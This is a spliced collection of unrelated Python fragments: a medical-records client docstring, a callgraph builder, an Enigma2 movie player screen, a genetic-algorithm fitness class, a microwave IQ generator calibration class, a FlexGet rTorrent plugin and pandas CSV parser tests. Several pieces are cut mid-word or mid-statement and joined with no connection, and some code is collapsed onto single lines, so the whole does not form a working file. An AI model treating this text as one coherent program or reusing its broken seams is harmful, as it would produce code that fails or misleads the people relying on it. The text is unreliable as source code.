PatientRecord(name={'last': 'foo', 'first': 'bar'}) if ok: # you also can decide what to do in case of record rejection
assert (yield OrderRecord()) yield TerminatorRecord() # we may do not care about rejection :class:`Client` thought :class:`RecordsStateMachine` keep track on this order, raising :exc:`AssertionError` if it is broken. When `emitter` terminates with :exc:`StopIteration` or :exc:`GeneratorExit` exception client connection to server closing too. You may provide endless `emitter` by wrapping function body with ``while True: ...`` loop polling data from s
ource from time to time. Note, that server may have communication timeouts control and may close session after some time of inactivity, so be sure that you're able to send whole session (started by Header record and ended by Terminator one) within limited time frame (commonly 10-15 sec.). """ #: Wrapper of emitter to provide session context and system logic about #: sending head and tail data. emitter_wrapper = Emitter def __init__(self, emitter, host='localhost', port=15200, encoding=None, timeout=20, flow_map=DEFAULT_RECORDS_FLOW_MAP, chunk_size=None, bulk_mode=False): super(Client, self).__init__(timeout=timeout) self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.connect((host, port)) self.emitter = self.emitter_wrapper( emitter, encoding=encoding or self.encoding, flow_map=f
# -*- coding: utf-8 -*-
#
# LICENCE      MIT
#
# DESCRIPTION  Callgraph builder.
#
# AUTHOR       Michal Bukovsky <michal.bukovsky@trilogic.cz>
#

from operator import attrgetter
from inspect import signature

from callgraph.hooks import Hooks
from callgraph.utils import AuPair
from callgraph.symbols import Symbol, UnarySymbol
from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol
from callgraph.nodes import make_node
from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree

# TODO(burlog): hooks as callbacks
# TODO(burlog): properties tests
# TODO(burlog): process signature? are defs invoked during import?
# TODO(burlog): tests for global variables
# TODO(burlog): __getattr__, __getattribute__ overrides will be problem
# TODO(burlog): make result of list(), tuple(), dict(), ... iterable


class CallGraphBuilder(object):
    """Builds a call graph by symbolically evaluating Python callables."""

    def __init__(self, global_variables=None, silent=False):
        """
        :param global_variables: name -> value mapping made visible to the
            analyzed code. BUG FIX: was a mutable ``{}`` default.
        :param silent: suppress progress output when True.
        """
        self.printer = NonePrinter() if silent else IndentPrinter()
        self.global_symbols = self.make_kwargs_symbols(global_variables or {})
        self.hooks = Hooks(self)
        self.current_lineno = 0
        # Node currently under analysis — presumably maintained by AuPair;
        # TODO confirm.
        self.tot = None

    def print_banner(self, printer, node):
        """Print the 'Analyzing: ...' banner for *node*."""
        extra = "<" + node.qualname + "> " if node.qualname != node.name else ""
        printer("@ Analyzing: {0} {1}at {2}:{3}"\
                .format(node.ast.name, extra, node.filename, node.lineno))

    def set_current_lineno(self, printer, expr_lineno):
        """Track the absolute source line being evaluated; log on change."""
        lineno = self.tot.lineno + expr_lineno
        if lineno == self.current_lineno:
            return
        self.current_lineno = lineno
        printer("+ line at {0}:{1}".format(self.tot.filename, lineno))
        printer("+", self.tot.source_line(expr_lineno).strip())

    def make_kwargs_symbols(self, kwargs):
        """Wrap each plain value in *kwargs* into a UnarySymbol."""
        return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items())

    def build(self, function, kwargs=None):
        """Entry point: build and return the call graph of *function*.

        :param kwargs: initial keyword arguments for the analyzed call.
            BUG FIX: was a mutable ``{}`` default.
        """
        self.root = None
        self.hooks.clear()
        symbol = UnarySymbol(self, function.__name__, function)
        return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs or {}))

    def process(self, symbol, parent=None, args=None, kwargs=None):
        """Process one callable symbol and attach its node under *parent*.

        BUG FIX: the old mutable defaults ``args=[]``/``kwargs={}`` leaked
        state between unrelated calls — inject_self() mutates ``args`` in
        place (args.insert), so the shared default list kept growing.
        """
        args = [] if args is None else args
        kwargs = {} if kwargs is None else kwargs
        # attach new node to parent list
        node = make_node(symbol)
        with AuPair(self, node):
            if parent:
                where = parent.filename, self.current_lineno
                if not parent.attach(node, where): return node

            # builtins or c/c++ objects have no code
            if node.is_opaque: return node
            if not symbol.iscallable(): return node

            # print nice banner
            self.print_banner(self.printer, node)

            # magic follows
            with self.printer as printer:
                self.inject_arguments(printer, node, args, kwargs)
                self.process_function(printer, node, args, kwargs)
        return node

    def process_function(self, printer, node, args, kwargs):
        """Evaluate the body of *node* and recurse into every call found."""
        for expr in node.ast.body:
            for callee, args, kwargs in expr.evaluate(printer, node.symbol):
                self.process(callee, node, args.copy(), kwargs.copy())

    def inject_arguments(self, printer, node, args, kwargs):
        """Bind call args (incl. self and defaults) into the node's scope."""
        sig = signature(node.symbol.value)
        self.inject_self(printer, node, sig, args, kwargs)
        bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs))
        self.inject_defaults(printer, node, sig, bound)
        for name, value in bound.arguments.items():
            value_symbol = self.as_symbol(value)
            printer("% Binding argument:", name + "=" + str(value_symbol))
            node.symbol.set(name, value_symbol)

    def polish_kwargs(self, sig, kwargs):
        """Drop kwargs the signature can't take, unless it has **kwargs."""
        for param in sig.parameters.values():
            if param.kind == param.VAR_KEYWORD: return kwargs
        return dict(self.iter_kwargs(sig, kwargs))

    def iter_kwargs(self, sig, kwargs):
        """Yield only the (name, value) pairs matching named parameters."""
        for param in sig.parameters.values():
            if param.kind == param.POSITIONAL_OR_KEYWORD:
                if param.name in kwargs:
                    yield param.name, kwargs[param.name]

    def inject_self(self, printer, node, sig, args, kwargs):
        """Prepend the bound instance when the callable looks like a method."""
        if node.symbol.myself and sig.parameters:
            # TODO(burlog): better bound method detection
            if next(iter(sig.parameters.keys())) == "self":
                args.insert(0, node.symbol.myself)
            else:
                # TODO(burlog): improve detection logic
                kwargs["self"] = node.symbol.myself

    def inject_defaults(self, printer, node, sig, bound):
        """Fill unbound parameters with symbols for their default values."""
        for param in sig.parameters.values():
            if param.name not in bound.arguments:
                if param.default is not param.empty:
                    symbol = UnarySymbol(self, param.name, param.default)
                    bound.arguments[param.name] = symbol

    def as_symbol(self, value):
        """Coerce *value* (Symbol, sequence or dict) into a Symbol."""
        if isinstance(value, Symbol):
            return value
        elif isinstance(value, (tuple, list)):
            return IterableConstantSymbol(self, tuple, value)
        elif isinstance(value, dict):
            values = list(value.values())
            keys = list(UnarySymbol(self, "str", k) for k in value.keys())
            return MappingConstantSymbol(self, dict, keys, values)
        raise RuntimeError("Can't convert value to symbol: " + str(value))


# dogfooding build function
if __name__ == "__main__":
    builder = CallGraphBuilder()
    kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build}
    root = builder.build(CallGraphBuilder.build, kwargs)
    print(80 * "=")
    dump_tree(root, lambda x: x.children)
s current selected track: " + str(x)) return True else: print("[MoviePlayer] audio track is current selected track: " + str(x)) return True elif entry == x[1] and seltrack != x[0]: if useAc3: if x[2].startswith('AC'): print("[MoviePlayer] audio track match: " + str(x)) tracks.selectTrack(x[0]) return True else: print("[MoviePlayer] audio track match: " + str(x)) tracks.selectTrack(x[0]) return True return False class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \ InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications, InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup): ENABLE_RESUME_SUPPORT = True ALLOW_SUSPEND = True instance = None def __init__(self, session, service, slist = None, lastservice = None): Screen.__init__(self, session) InfoBarAspectSelection.__init__(self) InfoBarAudioSelection.__init__(self) InfoBarSimpleEventView.__init__(self) self.pts_pvrStateDialog = "" self["key_yellow"] = Label() self["key_blue"] = Label() self["key_green"] = Label() self["eventname"] = Label() self["state"] = Label() self["speed"] = Label() self["statusicon"] = MultiPixmap() self["actions"] = HelpableActionMap(self, "MoviePlayerActions", { "leavePlayer": (self.leavePlayer, _("leave movie player...")), "leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player...")) }) self.allowPiP = True for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \ InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \ InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \ InfoBarServiceNotifications, InfoBarPVRState, 
InfoBarCueSheetSupport, \ InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \ InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \ InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup: x.__init__(self) self.onChangedEntry = [ ] self.servicelist = slist self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup() session.nav.playService(service) self.cur_service = service self.returning = False self.onClose.append(self.__onClose) self.onShow.append(self.doButtonsCheck) self.__event_tracker = ServiceEventTracker(screen=self, eventmap= { enigma.iPlayableService.evStart: self.__evStart }) assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!" MoviePlayer.instance = self # is needed for every first call of MoviePlayer self.__evStart() def __evStart(self): self.switchAudioTimer = enigma.eTimer() self.switchAudioTimer.callback.append(self.switchAudio) self.switchAudioTimer.start(750, True) # 750 is a safe-value def switchAudio(self): service = self.session.nav.getCurrentlyPlayingServiceOrGroup() if service: # we go this way for other extensions as own records(they switch over pmt) path = service.getPath() import os ext = os.path.splitext(path)[1].lower() exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ? 
if ext.lower() in exts: service = self.session.nav.getCurrentService() if service: setAudioTrack(service) def doButtonsCheck(self): if config.plisettings.ColouredButtons.value: self["key_yellow"].setText(_("Extensions")) self["key_green"].setText(_("Green Panel")) self["key_blue"].setText(_("Blue Panel")) def __onClose(self): MoviePlayer.instance = None from Screens.MovieSelection import playlist del playlist[:] Screens.InfoBar.InfoBar.instance.callServiceStarted() self.session.nav.playService(self.lastservice) config.usage.last_movie_played.value = self.cur_service.toString() config.usage.last_movie_played.save() def handleLeave(self, how): self.is_closing = True if how == "ask": if config.usage.setup_level.index < 2: # -expert list = ( (_("Yes"), "quit"), (_("No"), "continue") ) else: list = ( (_("Yes"), "quit"), (_("Yes, returning to movie list"), "movielist"), (_("Yes, and delete this movie"), "quitanddelete"), (_("Yes, delete this movie and return to movie list"), "deleteandmovielist"), (_("No"), "continue"), (_("No, but restart from begin"), "restart") ) from Screens.ChoiceBox import ChoiceBox self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list) else: self.leavePlayerConfirmed([True, how]) def leavePlayer(self): setResumePoint(self.session) self.handleLeave(config.usage.on_movie_stop.value) def leavePlayerOnExit(self): if self.shown: self.hide() elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value: if config.usage.pip_hideOnExit.value == "popup": self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True) else: self.hidePipOnExitCallback(True) elif config.usage.leave_movieplayer_onExit.value == "popup": self.session.openWithCallback(self.leavePlayerOnExitCallback, MessageBox, _("Exit movie player?"), simple=True) elif config.usage.leave_movieplayer_onExit.value == "without popup": self.leavePlayerOnExitCallback(True) 
elif config.usage.leave_movieplayer_onExit.value == "stop": self.leavePlayer() def leavePlayerOnExitCallback(self, answer): if answer: setResumePoint(self.session) self.handleLeave("quit") def hidePipOnExitCallback(self, answer): if answer: self.showPiP() def deleteConfirmed(self, answer): if answer: self.leavePlayerConfirmed((True, "quitanddeleteconfirmed")) def deleteAndMovielistConfirmed(self, answer): if answer: self.leavePlayerConfirmed((True, "deleteandmovielistconfirmed")) def movielistAgain(self): from Screens.MovieSelection import playlist del playlist[:] self.session.nav.playService(self.lastservice) self.leavePlayerConfirmed((True, "movielist")) def leave
PlayerConfirmed(self,
answer): answer = answer and answer[1] if answer is None: return if answer in ("quitanddelete", "quitanddeleteconfirmed", "deleteandmovielist", "deleteandmovielistconfirmed"): ref = self.session.nav.getCurrentlyPlayingServiceOrGroup() serviceHandler = enigma.eServiceCenter.getInstance() if answer in ("quitanddelete", "deleteandmovielist"): msg = '' if config.usage.movielist_trashcan.value: import Tools.Trashcan try: trash = Tools.Trashcan.createTrashFolder(ref.getPath()) Screens.MovieSelection.moveServiceFiles(ref, trash) # Moved to trash, okay if answer == "quitanddelete": self.close() else: self.movielistAgain() return except Exception, e: print "[InfoBar] Failed to move to .Trash folder:", e msg = _("Cannot move to trash can") + "\n" + str(e) + "\n" info = serviceHandler.info(ref) name = info and info.getName(ref) or _("this recording") msg += _("Do you really want to delete %s?") % name if answer == "quitanddelete": self.session.openWithCallback(self.deleteConfirmed, MessageBox, msg) elif answer == "deleteandmovielist": self.session.openWithCallback(self.deleteAndMovielistConfirmed, MessageBox, msg) return elif answer in ("quitanddeleteconfirmed", "deleteandmovielistconfirmed"): offline = serviceHandler.offlineOperations(ref) if offline.deleteFromDisk(0): self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR) if answer == "deleteandmovielistconfirmed": self.movielistAgain() return if answer in ("quit", "quitanddeleteconfirmed"): self.c
class target(object):
    """
    Fitness target for a genetic-algorithm run over two groups of genes.

    Fitness is maximal (0) when group1 sums to 36 and group2 multiplies to
    360 with no duplicate gene values across the two groups; every deviation
    and every duplicate lowers the (non-positive) fitness.
    """

    def __init__(self):
        # Gene-range encoding string; its format is interpreted by the GA
        # framework that consumes this class — TODO confirm exact grammar.
        self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2"
        self.canAdd = False       # genome length is fixed
        self.canRemove = False
        self.initializationType = "sequential"
        self.encodingTable = None
        self.group1 = []
        self.group2 = []

    def build_from_genome(self, genome):
        """
        Load gene groups from `genome`.

        `genome` is a pair of sequences; element 0 of each sequence is a
        tag/marker and is skipped.
        """
        # BUG FIX: was `genome != None` — `is not None` is the correct
        # identity comparison for None checks.
        assert genome is not None, "Null genome passed to target!"
        self.group1 = genome[0][1:]
        self.group2 = genome[1][1:]
        # self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize]

    def evaluate(self):
        """
        Return the fitness of the currently loaded genome.

        fitness = -( |prod(group2) - 360| + |sum(group1) - 36| ) - duplicates,
        where `duplicates` counts repeated gene values across both groups.
        """
        gene_sum = sum(self.group1)
        product = 1
        for gene in self.group2:
            product *= gene
        genes = list(self.group1) + list(self.group2)
        duplicate_count = len(genes) - len(set(genes))
        fitness = -(abs(product - 360) + abs(gene_sum - 36)) - duplicate_count
        # print("\nFITNESS:", fitness, "\n")
        return fitness

    def validate_genome(self, genome):
        """All genomes are considered structurally valid."""
        return True
if "freq" in parameters_dict: self.set_frequency(parameters_dict["freq"]) if "dac_overridden" in parameters_dict: self._dac_overridden = parameters_dict["dac_overridden"] else: self._dac_overridden = False def get_iqawg(self): self._iqawg.set_parameters( {'calibration': self._current_cal}) # ensure return self._iqawg def set_if_frequency(self, if_frequency): self._if_frequency = if_frequency self._if_period = 1 / if_frequency * 1e9 # ns def get_if_frequency(self): return self._if_frequency def set_output_state(self, state): self._lo.set_output_state(state) def set_frequency(self, freq): self._frequency = freq self._lo.set_frequency(self._frequency + self._if_frequency) self._requested_cal = self.get_calibration(self._frequency, self._power) self._output_SSB() def set_power(self, power): if power > self._default_calibration_power + 10: raise ValueError("Power can be % dBm max, requested %d dBm" % ( self._default_calibration_power + 10, power)) self._power = power self._requested_cal = self.get_calibration(self._frequency, self._power) self._lo.set_power(self._requested_cal.get_lo_power()) self._output_SSB() def get_power(self): return self._power def set_marker_period(self, marker_period): ''' For some applications there is need to control the length of the interval between triggers output by the AWG of the IQVectorGenerator. 
Parameters ---------- marker_period: ns, float real trigger period will be recalculated to be not shorter than <marker_period> ns, but still divisible by the IF period ''' self._requested_marker_period = marker_period correct_marker_period = ceil( marker_period / self._marker_period_divisor) * \ self._marker_period_divisor if correct_marker_period != self._marker_period: self._marker_period = correct_marker_period if self._requested_cal is not None: self._current_cal = None self._output_SSB() for slave_iqvg in self._slave_iqvgs: slave_iqvg.set_marker_period(self._marker_period) def _output_SSB(self): if self._requested_cal != self._current_cal: # print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz" # f", power: {self._power} dBm.") self._iqawg.set_parameters({"calibration": self._requested_cal}) pb = self._iqawg.get_pulse_builder() if_freq = self._requested_cal.get_radiation_parameters()[ "if_frequency"] resolution = self._requested_cal.get_radiation_parameters()[ "waveform_resolution"] if_period = 1 / if_freq * 1e9 if (if_period * 1e9) % resolution != 0: print( f"IQVectorGenerator {self._name} warning: IF period is not divisible by " "calibration waveform resolution. 
Phase coherence will be bad.") seq = pb.add_sine_pulse(self._marker_period).build() self._iqawg.output_pulse_sequence(seq) self._current_cal = self._requested_cal # time.sleep(1) def _load_cal_db(self): self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0) def _around_frequency(self, frequency): # return ceil(frequency/self._calibration_step)*self._calibration_step return round(frequency / self._calibration_step) * self._calibration_step def get_calibration(self, frequency, power): frequency = self._around_frequency(frequency) # frequency = round(frequency/self._calibration_step)*self._calibration_step if self._cal_db is None: self._load_cal_db() cal = \ self._cal_db.get(frozenset(dict(lo_power=14, ssb_power=self._default_calibration_power, lo_frequency=self._if_frequency + frequency, if_frequency=self._if_frequency, waveform_resolution=1, sideband_to_maintain='left').items())) if (cal is None) or self._recalibrate_mixer: calibrator = IQCalibrator(self._iqawg, self._sa, self._lo, self._cal_db_name, 0, sidebands_to_suppress=6, output_widget=self._calibration_widget) ig = self._calibration_initial_guess cal = calibrator.calibrate( lo_frequency=frequency + self._if_frequency, if_frequency=self._if_frequency, lo_power=14, ssb_power=self._default_calibration_power, waveform_resolution=1, iterations=3, minimize_iterlimit=100, sa_res_bandwidth=300, initial_guess=ig) save_IQMX_calibration(cal) self._load_cal_db() # make sure to include new calibration into cache cal._ssb_power = power cal._if_amplitudes = cal._if_amplitudes / np.sqrt( 10 ** ((self._default_calibration_power - power) / 10)) # self._calibration_initial_guess["if_amplitudes"] = cal._if_amplitudes self._calibration_initial_guess["if_phase"] = cal._if_phase return cal else: cal = cal.copy() cal._if_amplitudes = cal._if_amplitudes / np.sqrt( 10 ** ((self._default_calibration_power - power) / 10)) return cal def calibrate_mixer(self, fstart, fstop, recalibrate=False): """ Performs calibration of the 
mixer in a frequency range Parameters ---------- fstart: float start of the frequency range fstop : float stop of the frequency range recalibrate : bool Whether or not to calibrate from scratch and override previous calibration in this interval. """ fstart = self._around_frequency(fstart) fstop = self._around_frequency(fstop) self._recalibrate_mixer = recalibrate pb = tqdm(np.arange(fstart, fstop + self._calibration_step, self._calibration_step), smoothing=0) for frequency in pb: pb.set_description("%.3f GHz" % (frequency / 1e9)) for cou
nter in range(3): try: self.set_frequency(frequency) break except ValueError: print("Poor calibration at %.3f GHz, retry count " "%d" % (frequency / 1e9, counter)) self._calibration_initial_guess["dc_offest"] = \
np.random.uniform(.03, 0.1, size=2) self._recalibrate_mixer = False def test_calibration(self, fstart, fstop, step=1e6, sidebands_to_plot=[-1, 0, 1], remeasure=False): """ Tests the saved calibrations by monitoring all the sidebands throughout the specified frequency range Parameters ---------- fstart: float, Hz start of the frequency range fstop: float, Hz stop of the frequency range step: float, Hz step of the scan remeasure : bool remeasure or just replot the data from the previous run """ sideband_shifts = np.linspace(-3, 3, 7) * self._if_frequency freqs = np.arange(fstart, fstop + step, step)
if config_value: options[opt_key] = entry.render(config_value) elif entry_value: options[opt_key] = entry.render(entry_value) # Convert priority from string to int priority = options.get('priority') if priority and priority in self.priority_map: options['priority'] = self.priority_map[priority] # Map Flexget path to directory in rTorrent if options.get('path'): options['directory'] = options['path'] del options['path'] if 'directory' in options: options['directory'] = pathscrub(options['directory']) return options def on_task_start(self, task, config): try: client = RTorrent(os.path.expanduser(config['uri']), username=config.get('username'), password=config.get('password'), digest_auth=config['digest_auth'], session=task.requests) if client.version < [0, 9, 2]: log.error('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version)))) task.abort('rtorrent version >=0.9.2 required, found {0}'.format('.'.join(map(str, client.version)))) except (IOError, xmlrpc_client.Error) as e: raise plugin.PluginError("Couldn't connect to rTorrent: %s" % str(e)) class RTorrentOutputPlugin(RTorrentPluginBase): schema = { 'type': 'object', 'properties': { # connection info 'uri': {'type': 'string'}, 'username': {'type': 'string'}, 'password': {'type': '
string'}, 'digest_auth': {'type': 'boolean', 'default': False}, 'start': {'type': 'boolean', 'default': True}, 'mkdir': {'type': 'boolean', 'default': True}, 'action': {'type':
'string', 'emun': ['update', 'delete', 'add'], 'default': 'add'}, # properties to set on rtorrent download object 'message': {'type': 'string'}, 'priority': {'type': 'string'}, 'path': {'type': 'string'}, 'custom1': {'type': 'string'}, 'custom2': {'type': 'string'}, 'custom3': {'type': 'string'}, 'custom4': {'type': 'string'}, 'custom5': {'type': 'string'}, }, 'required': ['uri'], 'additionalProperties': False, } def _verify_load(self, client, info_hash): ex = IOError() for _ in range(0, 5): try: return client.torrent(info_hash, fields=['hash']) except (IOError, xmlrpc_client.Error) as e: ex = e sleep(0.5) raise ex @plugin.priority(120) def on_task_download(self, task, config): # If the download plugin is not enabled, we need to call it to get # our temp .torrent files if config['action'] == 'add' and 'download' not in task.config: download = plugin.get_plugin_by_name('download') download.instance.get_temp_files(task, handle_magnets=True, fail_html=True) @plugin.priority(135) def on_task_output(self, task, config): client = RTorrent(os.path.expanduser(config['uri']), username=config.get('username'), password=config.get('password'), digest_auth=config['digest_auth'], session=task.requests) for entry in task.accepted: if config['action'] == 'add': if task.options.test: log.info('Would add %s to rTorrent', entry['url']) continue try: options = self._build_options(config, entry) except RenderError as e: entry.fail("failed to render properties %s" % str(e)) continue self.add_entry(client, entry, options, start=config['start'], mkdir=config['mkdir']) info_hash = entry.get('torrent_info_hash') if not info_hash: entry.fail('Failed to %s as no info_hash found' % config['action']) continue if config['action'] == 'delete': if task.options.test: log.info('Would delete %s (%s) from rTorrent', entry['title'], entry['torrent_info_hash']) continue self.delete_entry(client, entry) if config['action'] == 'update': if task.options.test: log.info('Would update %s (%s) in rTorrent', 
entry['title'], entry['torrent_info_hash']) continue self.update_entry(client, entry, config) def delete_entry(self, client, entry): try: client.delete(entry['torrent_info_hash']) log.verbose('Deleted %s (%s) in rtorrent ' % (entry['title'], entry['torrent_info_hash'])) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed to delete: %s' % str(e)) return def update_entry(self, client, entry, config): info_hash = entry['torrent_info_hash'] # First check if it already exists try: existing = client.torrent(info_hash, fields=['base_path']) except IOError as e: entry.fail("Error updating torrent %s" % str(e)) return except xmlrpc_client.Error as e: existing = False # Build options but make config values override entry values try: options = self._build_options(config, entry, entry_first=False) except RenderError as e: entry.fail("failed to render properties %s" % str(e)) return if existing and 'directory' in options: # Check if changing to another directory which requires a move if options['directory'] != existing['base_path'] \ and options['directory'] != os.path.dirname(existing['base_path']): try: log.verbose("Path is changing, moving files from '%s' to '%s'" % (existing['base_path'], options['directory'])) client.move(info_hash, options['directory']) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed moving torrent: %s' % str(e)) return # Remove directory from update otherwise rTorrent will append the title to the directory path if 'directory' in options: del options['directory'] try: client.update(info_hash, options) log.verbose('Updated %s (%s) in rtorrent ' % (entry['title'], info_hash)) except (IOError, xmlrpc_client.Error) as e: entry.fail('Failed to update: %s' % str(e)) return def add_entry(self, client, entry, options, start=True, mkdir=False): if 'torrent_info_hash' not in entry: entry.fail('missing torrent_info_hash') return if entry['url'].startswith('magnet:'): torrent_raw = 'd10:magnet-uri%d:%se' % (len(entry['url']), entry['url']) 
torrent_raw = torrent_raw.encode('ascii') else: # Check that file is downloaded if 'file' not in entry: raise plugin.PluginError('Temporary download file is missing from entry') # Verify the temp file exists if not os.path.exists(entry['file']): raise plugin.PluginError('Temporary download file is missing from disk') # Verify valid torrent file if not is_torrent_file(entry['file']): entry.fail("Downloaded temp file '%s' is not a torrent file" % entry['file']) return try: with open(entry['file'], 'rb') as f: torrent_raw = f.read() except IOError as e: entry.fail('Failed to add to rTorr
# NOTE(review): chunk starts mid-import — "Frame" below is the tail of a name
# in the `from pandas import (` list whose opening line precedes the visible
# region (likely DataFrame). These are pandas python-engine parser tests; they
# rely on the `python_parser_only` fixture and helpers (StringIO, BytesIO, csv,
# pytest, DataFrame, ParserError) imported above this chunk.
    Frame,
    Index,
    MultiIndex,
)
import pandas._testing as tm


def test_default_separator(python_parser_only):
    # see gh-17333
    #
    # csv.Sniffer in Python treats "o" as separator.
    data = "aob\n1o2\n3o4"
    parser = python_parser_only
    expected = DataFrame({"a": [1, 3], "b": [2, 4]})

    result = parser.read_csv(StringIO(data), sep=None)
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize("skipfooter", ["foo", 1.5, True])
def test_invalid_skipfooter_non_int(python_parser_only, skipfooter):
    # see gh-15925 (comment)
    data = "a\n1\n2"
    parser = python_parser_only
    msg = "skipfooter must be an integer"

    with pytest.raises(ValueError, match=msg):
        parser.read_csv(StringIO(data), skipfooter=skipfooter)


def test_invalid_skipfooter_negative(python_parser_only):
    # see gh-15925 (comment)
    data = "a\n1\n2"
    parser = python_parser_only
    msg = "skipfooter cannot be negative"

    with pytest.raises(ValueError, match=msg):
        parser.read_csv(StringIO(data), skipfooter=-1)


@pytest.mark.parametrize("kwargs", [{"sep": None}, {"delimiter": "|"}])
def test_sniff_delimiter(python_parser_only, kwargs):
    # sep=None triggers csv.Sniffer-based delimiter detection.
    data = """index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""
    parser = python_parser_only
    result = parser.read_csv(StringIO(data), index_col=0, **kwargs)
    expected = DataFrame(
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
        columns=["A", "B", "C"],
        index=Index(["foo", "bar", "baz"], name="index"),
    )
    tm.assert_frame_equal(result, expected)


def test_sniff_delimiter_comment(python_parser_only):
    # Sniffing must still work when comment lines are present.
    data = """# comment line
index|A|B|C
# comment line
foo|1|2|3 # ignore | this
bar|4|5|6
baz|7|8|9
"""
    parser = python_parser_only
    result = parser.read_csv(StringIO(data), index_col=0, sep=None, comment="#")
    expected = DataFrame(
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
        columns=["A", "B", "C"],
        index=Index(["foo", "bar", "baz"], name="index"),
    )
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize("encoding", [None, "utf-8"])
def test_sniff_delimiter_encoding(python_parser_only, encoding):
    # Sniffing must work on both str and wrapped-bytes inputs.
    parser = python_parser_only
    data = """ignore this
ignore this too
index|A|B|C
foo|1|2|3
bar|4|5|6
baz|7|8|9
"""

    if encoding is not None:
        from io import TextIOWrapper

        data = data.encode(encoding)
        data = BytesIO(data)
        data = TextIOWrapper(data, encoding=encoding)
    else:
        data = StringIO(data)

    result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding)
    expected = DataFrame(
        [[1, 2, 3], [4, 5, 6], [7, 8, 9]],
        columns=["A", "B", "C"],
        index=Index(["foo", "bar", "baz"], name="index"),
    )
    tm.assert_frame_equal(result, expected)


def test_single_line(python_parser_only):
    # see gh-6607: sniff separator
    parser = python_parser_only
    result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None)

    expected = DataFrame({"a": [1], "b": [2]})
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}])
def test_skipfooter(python_parser_only, kwargs):
    # see gh-6607
    data = """A,B,C
1,2,3
4,5,6
7,8,9
want to skip this
also also skip this
"""
    parser = python_parser_only
    result = parser.read_csv(StringIO(data), **kwargs)

    expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"])
    tm.assert_frame_equal(result, expected)


@pytest.mark.parametrize(
    "compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")]
)
def test_decompression_regex_sep(python_parser_only, csv1, compression, klass):
    # see gh-6607: regex separators combined with compressed input.
    parser = python_parser_only

    with open(csv1, "rb") as f:
        data = f.read()

    data = data.replace(b",", b"::")
    expected = parser.read_csv(csv1)

    module = pytest.importorskip(compression)
    klass = getattr(module, klass)

    with tm.ensure_clean() as path:
        tmp = klass(path, mode="wb")
        tmp.write(data)
        tmp.close()

        result = parser.read_csv(path, sep="::", compression=compression)
        tm.assert_frame_equal(result, expected)


def test_read_csv_buglet_4x_multi_index(python_parser_only):
    # see gh-6607
    # NOTE(review): original intra-string whitespace was mangled in this chunk;
    # sep=r"\s+" makes the exact run lengths irrelevant to the parse.
    data = """ A B C D E
one two three four
a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640
a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744
x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838"""
    parser = python_parser_only

    expected = DataFrame(
        [
            [-0.5109, -2.3358, -0.4645, 0.05076, 0.3640],
            [0.4473, 1.4152, 0.2834, 1.00661, 0.1744],
            [-0.6662, -0.5243, -0.3580, 0.89145, 2.5838],
        ],
        columns=["A", "B", "C", "D", "E"],
        index=MultiIndex.from_tuples(
            [("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)],
            names=["one", "two", "three", "four"],
        ),
    )
    result = parser.read_csv(StringIO(data), sep=r"\s+")
    tm.assert_frame_equal(result, expected)


def test_read_csv_buglet_4x_multi_index2(python_parser_only):
    # see gh-6893
